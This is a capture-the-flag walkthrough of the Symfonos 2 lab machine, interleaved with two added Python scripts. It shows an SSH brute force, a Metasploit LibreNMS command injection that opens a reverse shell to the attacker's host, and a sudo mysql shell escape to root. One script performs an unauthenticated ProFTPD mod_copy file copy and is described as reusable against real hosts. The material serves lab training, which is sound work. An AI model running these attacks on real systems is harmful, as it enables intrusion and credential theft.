Symfonos 2

This is the second box of the Symfonos series by @zayotic. It is described as an OSCP-like, intermediate, real-life based machine designed to teach the importance of understanding a vulnerability, and it can be found here.
Enumeration
As always, I start with a port scan to find out which ports are open and which services are running behind them.
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.3.5
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 9d:f8:5f:87:20:e5:8c:fa:68:47:7d:71:62:08:ad:b9 (RSA)
|   256 04:2a:bb:06:56:ea:d1:93:1c:d2:78:0a:00:46:9d:85 (ECDSA)
|_  256 28:ad:ac:dc:7e:2a:1c:f6:4c:6b:47:f2:d6:22:5b:52 (ED25519)
80/tcp  open  http        WebFS httpd 1.21
|_http-server-header: webfs/1.21
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 00:0C:29:D7:5B:50 (VMware)
Service Info: Host: SYMFONOS2; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -2s
|_nbstat: NetBIOS name: SYMFONOS2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos2
|   NetBIOS computer name: SYMFONOS2\x00
|   Domain name: \x00
|   FQDN: symfonos2
|_  System time: 2019-08-02T01:16:44-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-08-02 08:16:44
|_  start_date: N/A
The following ports are open:
- 21 – runs FTP (ProFTPD version 1.3.5)
- 22 – runs SSH (OpenSSH version 7.4p1)
- 80 – runs HTTP (WebFS version 1.21)
- 139 – SMB (smbd version 3.X-4.X)
- 445 – SMB (smbd version 4.5.16 – Debian)
FTP
Let's start with FTP, because ProFTPD 1.3.5 ships with the mod_copy module, whose SITE CPFR and SITE CPTO commands can be issued without authenticating (CVE-2015-3306). A quick check with netcat confirms the commands are exposed.
root@cyberspace:~/symfonos2# nc 10.10.10.15 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.10.15]
site help
214-The following SITE commands are recognized (* =>'s unimplemented)
 CPFR <sp> pathname
 CPTO <sp> pathname
 HELP
 CHGRP
 CHMOD
214 Direct comments to root@symfonos2
These are the available SITE commands. CPFR and CPTO copy a file on the remote machine (CPFR names the source, CPTO the destination), and CHGRP and CHMOD change a file's group and mode. It looks like a setup for a later stage: these commands will give me some options once I have access. For now I'm going to check out the other services.
Webserver
The website consists of a single image. DirSearch finds no directories other than the main landing page, and the page source holds no useful information. Next is the Samba server.
Samba
root@cyberspace:~/symfonos2# smbmap -r -H 10.10.10.15
[+] Finding open SMB ports....
[+] Guest SMB session established on 10.10.10.15...
[+] IP: 10.10.10.15:445	Name: unkown
	Disk                                                  	Permissions
	----                                                  	-----------
	print$                                            	NO ACCESS
	anonymous                                         	READ ONLY
	./
	dr--r--r--                0 Thu Jul 18 16:30:09 2019	.
	dr--r--r--                0 Thu Jul 18 16:29:08 2019	..
	dr--r--r--                0 Thu Jul 18 16:25:17 2019	backups
	IPC$                                              	NO ACCESS
The anonymous share is readable by a guest session and contains a backups folder, so I connect with smbclient and pull what is in it.
root@cyberspace:~/symfonos2# smbclient \\\\10.10.10.15\\anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jul 18 16:30:09 2019
  ..                                  D        0  Thu Jul 18 16:29:08 2019
  backups                             D        0  Thu Jul 18 16:25:17 2019

		19728000 blocks of size 1024. 16313716 blocks available
smb: \> cd backups
smb: \backups\> ls
  .                                   D        0  Thu Jul 18 16:25:17 2019
  ..                                  D        0  Thu Jul 18 16:30:09 2019
  log.txt                             N    11394  Thu Jul 18 16:25:16 2019

		19728000 blocks of size 1024. 16313716 blocks available
smb: \backups\> get log.txt
getting file \backups\log.txt of size 11394 as log.txt (3708.9 KiloBytes/sec) (average 3709.0 KiloBytes/sec)
The file is a log of the administrator's setup session and includes the Samba and ProFTPD configuration. Two details stand out: /etc/shadow was copied to /var/backups/shadow.bak, and the anonymous share is served from /home/aeolus/share, which also gives me a username.

root@symfonos2:~# cat /etc/shadow > /var/backups/shadow.bak
root@symfonos2:~# cat /etc/samba/smb.conf
...
[anonymous]
    path = /home/aeolus/share
    browseable = yes
    read only = yes
    guest ok = yes
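As an added example (not code from the writeup, which did not attempt this), here is the SITE CPFR / SITE CPTO exchange driven from a script, run against a small constructed stand-in that mimics mod_copy's replies so it can be exercised offline. The source and destination paths are assumptions taken from the log above; whether a real ProFTPD can read a given source or write a given destination depends on the file modes and on the user the daemon runs as, which the writeup never checks.

```python
"""Added example: driving ProFTPD mod_copy's SITE CPFR / SITE CPTO without a
login. Not code from the original writeup. The server below is a constructed
stand-in that mimics the replies of mod_copy so the exchange runs offline;
all paths and file contents are assumptions."""
import socketserver
import threading
from ftplib import FTP, error_perm


class FakeModCopyHandler(socketserver.StreamRequestHandler):
    """Speaks just enough FTP for the exchange: banner, SITE CPFR/CPTO, QUIT."""

    def reply(self, text):
        self.wfile.write((text + "\r\n").encode())

    def handle(self):
        self.reply("220 ProFTPD 1.3.5 Server (constructed stand-in) [127.0.0.1]")
        pending = None                      # source path set by a successful CPFR
        files = self.server.files
        while True:
            line = self.rfile.readline()
            if not line:
                return
            verb, _, arg = line.decode().strip().partition(" ")
            verb = verb.upper()
            if verb == "QUIT":
                self.reply("221 Goodbye.")
                return
            if verb != "SITE":
                # mod_copy is the odd one out: everything else wants a login first
                self.reply("530 Please login with USER and PASS")
                continue
            sub, _, path = arg.partition(" ")
            sub = sub.upper()
            if sub == "CPFR":
                if path in files:
                    pending = path
                    self.reply("350 File or directory exists, ready for destination name")
                else:
                    self.reply(f"550 {path}: No such file or directory")
            elif sub == "CPTO":
                if pending is None:
                    self.reply("503 Bad sequence of commands")
                else:
                    files[path] = files[pending]   # the copy itself
                    pending = None
                    self.reply("250 Copy successful")
            else:
                self.reply(f"500 'SITE {sub}' not understood")


class FakeModCopyServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True

    def __init__(self, address, files):
        super().__init__(address, FakeModCopyHandler)
        self.files = dict(files)            # path -> contents, the pretend filesystem


def mod_copy(host, port, src, dst):
    """Copy src to dst on the server using only SITE CPFR/CPTO, no USER/PASS.

    Returns the two server replies. A 5xx reply (e.g. unreadable source) surfaces
    as ftplib.error_perm; an unexpected non-error reply raises RuntimeError."""
    ftp = FTP()
    ftp.connect(host, port, timeout=5)      # reads the 220 banner, no login
    try:
        r_cpfr = ftp.sendcmd(f"SITE CPFR {src}")
        if not r_cpfr.startswith("350"):
            raise RuntimeError(f"unexpected reply to CPFR: {r_cpfr}")
        r_cpto = ftp.sendcmd(f"SITE CPTO {dst}")
        if not r_cpto.startswith("250"):
            raise RuntimeError(f"unexpected reply to CPTO: {r_cpto}")
        return r_cpfr, r_cpto
    finally:
        ftp.quit()


def run_demo():
    """Constructed scenario: a shadow backup the daemon can read is copied into a
    directory that the log above shows is exported read-only over SMB."""
    src = "/var/backups/shadow.bak"         # assumption: readable by the daemon
    dst = "/home/aeolus/share/shadow.bak"   # assumption: writable by the daemon
    server = FakeModCopyServer(("127.0.0.1", 0),
                               {src: "root:$6$constructed:18000:0:99999:7:::\n"})
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address
    try:
        replies = mod_copy(host, port, src, dst)
        copied = server.files.get(dst)
        try:                                # a missing source must be refused
            mod_copy(host, port, "/does/not/exist", "/tmp/x")
            refused = False
        except error_perm:
            refused = True
    finally:
        server.shutdown()
        server.server_close()
    return replies, copied, refused


if __name__ == "__main__":
    print(run_demo())
```

Against a real host you would point mod_copy() at port 21 and then fetch the destination over whatever channel exposes it (here, the read-only anonymous share). The 550 branch matters in practice: a source the daemon cannot read fails at CPFR, before anything is written.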
I try to find more information, but at this point I really cannot find an opening to get access to the machine. My last resort is brute forcing SSH with the username I found, but I really don't like this option. It is very loud, and in real life you really don't want to try it, as it can easily crash the server. But for now I think I don't have a choice.
SSH
There are a lot of tools to brute force SSH, such as patator, medusa, hydra, Metasploit and many others. I'm going to use ncrack and turn down the timing template so I don't crash the server.
root@cyberspace:~/symfonos2# ncrack -v -u aeolus -P rockyou.txt 10.10.10.15:22 -T2
It took a really long time to crack this password as I’m on a VM. This is why I really don’t like brute forcing SSH. The long wait for this password is a bit disappointing.
Discovered credentials for ssh on 10.10.10.15 22/tcp: 10.10.10.15 22/tcp ssh: 'aeolus' 'sergioteamo'
With the password found I can finally access the remote machine.
root@cyberspace:~/symfonos2# ssh aeolus@10.10.10.15
aeolus@10.10.10.15's password:
Linux symfonos2 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u3 (2019-06-16) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 18 08:52:59 2019 from 192.168.201.1
aeolus@symfonos2:~$
Escalation of Privileges (EoP)
Running ss lists the listening sockets. Several services are bound only to localhost and were therefore invisible to the port scan: MySQL on 3306, something on 8080, and SMTP on 25.
aeolus@symfonos2:~$ ss -tupan | grep -i listen
tcp   LISTEN   0   80    127.0.0.1:3306    *:*
tcp   LISTEN   0   50            *:139     *:*
tcp   LISTEN   0   128   127.0.0.1:8080    *:*
tcp   LISTEN   0   32            *:21      *:*
tcp   LISTEN   0   128           *:22      *:*
tcp   LISTEN   0   20    127.0.0.1:25      *:*
tcp   LISTEN   0   50            *:445     *:*
tcp   LISTEN   0   50           :::139    :::*
tcp   LISTEN   0   64           :::80     :::*
tcp   LISTEN   0   128          :::22     :::*
tcp   LISTEN   0   20          ::1:25     :::*
tcp   LISTEN   0   50           :::445    :::*
To reach the service on 8080 I set up an SSH local port forward from my machine to the remote host. Pointing my browser at localhost port 8080 then lands on the service bound to 127.0.0.1:8080 on symfonos2, which turns out to be a LibreNMS instance.
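As an added example (not from the writeup), the listener classification above as a small parser over the ss output: it separates loopback-only services, the ones worth tunnelling, from those already reachable from the network, and handles the IPv6 forms (:::139, ::1:25) where a naive split on the first colon goes wrong. The sample input is the ss output shown above, embedded as a constructed string; the ssh command it builds is an assumption about how the forward was set up, since the writeup does not show its exact invocation.

```python
"""Added example, not code from the original writeup: classify `ss -tupan`
listeners into loopback-only (needs a tunnel) and exposed (already reachable)
and build the matching OpenSSH -L forward. Sample input is constructed from
the ss output shown in the writeup."""
import ipaddress

# Constructed sample: the listener lines from the writeup's ss output.
SS_OUTPUT = """\
tcp LISTEN 0 80 127.0.0.1:3306 *:*
tcp LISTEN 0 50 *:139 *:*
tcp LISTEN 0 128 127.0.0.1:8080 *:*
tcp LISTEN 0 32 *:21 *:*
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 20 127.0.0.1:25 *:*
tcp LISTEN 0 50 *:445 *:*
tcp LISTEN 0 50 :::139 :::*
tcp LISTEN 0 64 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 20 ::1:25 :::*
tcp LISTEN 0 50 :::445 :::*
"""


def split_endpoint(endpoint):
    """Split an ss local-address column into (host, port).

    ss prints '*' for the IPv4 wildcard, '::' for the IPv6 wildcard (so the
    column reads ':::139') and '::1:25' for IPv6 loopback, which is why the
    split has to be on the last colon only."""
    host, _, port = endpoint.rpartition(":")
    return host, int(port)


def is_loopback_only(host):
    """True when the socket is bound to a loopback address, not a wildcard."""
    if host in ("*", "", "::"):             # wildcard binds: every interface
        return False
    return ipaddress.ip_address(host).is_loopback


def classify_listeners(text):
    """Return (loopback_only_ports, exposed_ports), both sorted.

    A port counts as exposed if any of its sockets (IPv4 or IPv6) is bound to a
    wildcard or non-loopback address; a service that is loopback on one address
    family but wildcard on the other is still reachable from outside."""
    local, exposed = set(), set()
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[1] != "LISTEN":
            continue
        host, port = split_endpoint(fields[4])
        (local if is_loopback_only(host) else exposed).add(port)
    return sorted(local - exposed), sorted(exposed)


def forward_command(ports, user_at_host):
    """Build an OpenSSH command that forwards each loopback-only port to the
    same port on the attacker's machine (assumed form of the tunnel)."""
    forwards = " ".join(f"-L {p}:127.0.0.1:{p}" for p in ports)
    return f"ssh -N {forwards} {user_at_host}"


if __name__ == "__main__":
    local_only, exposed = classify_listeners(SS_OUTPUT)
    print("loopback only:", local_only)
    print("exposed:", exposed)
    print(forward_command(local_only, "aeolus@10.10.10.15"))
```

With -N the session carries only the forwards and opens no remote shell; after that, localhost:8080 on the attacking machine is the LibreNMS login page, and 3306 can be reached the same way with a local mysql client.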
root@cyberspace:~/symfonos2# searchsploit librenms
------------------------------------------------------------ ----------------------------------------
 Exploit Title                                              |  Path
                                                            | (/usr/share/exploitdb/)
------------------------------------------------------------ ----------------------------------------
LibreNMS - addhost Command Injection (Metasploit)           | exploits/linux/remote/46970.rb
LibreNMS 1.46 - 'addhost' Remote Code Execution             | exploits/php/webapps/47044.py
------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
There is a known command injection in LibreNMS's addhost function, and I choose the Metasploit module for it. The exploit needs valid LibreNMS credentials, and as I only have one set, I try aeolus / sergioteamo.
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > options

Module options (exploit/linux/http/librenms_addhost_cmd_inject):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   sergioteamo      yes       Password for LibreNMS
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base LibreNMS path
   USERNAME   aeolus           yes       User name for LibreNMS
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.10.16      yes       The listen address (an interface may be specified)
   LPORT  9999             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux

msf5 exploit(linux/http/librenms_addhost_cmd_inject) > exploit

[*] Started reverse TCP double handler on 10.10.10.16:9999
[*] Successfully logged into LibreNMS. Storing credentials...
[+] Successfully added device with hostname dyczzhbe
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname dyczzhbe and id #1
[*] Command: echo vtPYmvTObe97GfCg;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "vtPYmvTObe97GfCg\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (10.10.10.16:9999 -> 10.10.10.15:50890) at 2019-08-02 14:37:25 +0200

id
uid=1001(cronus) gid=1001(cronus) groups=1001(cronus),999(librenms)
python -c 'import pty;pty.spawn("/bin/bash");'
cronus@symfonos2:/opt/librenms/html$
cronus@symfonos2:/opt/librenms/html$ sudo -l
Matching Defaults entries for cronus on symfonos2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User cronus may run the following commands on symfonos2:
    (root) NOPASSWD: /usr/bin/mysql
cronus may run /usr/bin/mysql as root without a password. The mysql client can spawn a shell with \! (or system), and that shell inherits the client's effective user, which under sudo is root. Any sudo rule that grants an interactive program with a shell escape is a root shell in the same way.
cronus@symfonos2:/opt/librenms/html$ sudo mysql
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 5560
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> \! bash
root@symfonos2:/opt/librenms/html# whoami
root
Time to finish this up.
root@symfonos2:~# cat proof.txt
Congrats on rooting symfonos:2!
[ASCII-art banner]
Contact me via Twitter @zayotic to give feedback!
Conclusion
I really enjoyed this challenge. In my opinion I would skip the brute forcing part and try to put in a better way for people to retrieve the password. Also, I was surprised there was nothing left to do with the exploit on the FTP server.
But in the end the challenge was pretty nice, and I would like to thank the creator for some outstanding work. For now I'm done, but the next machine will certainly be the third and final part of this series.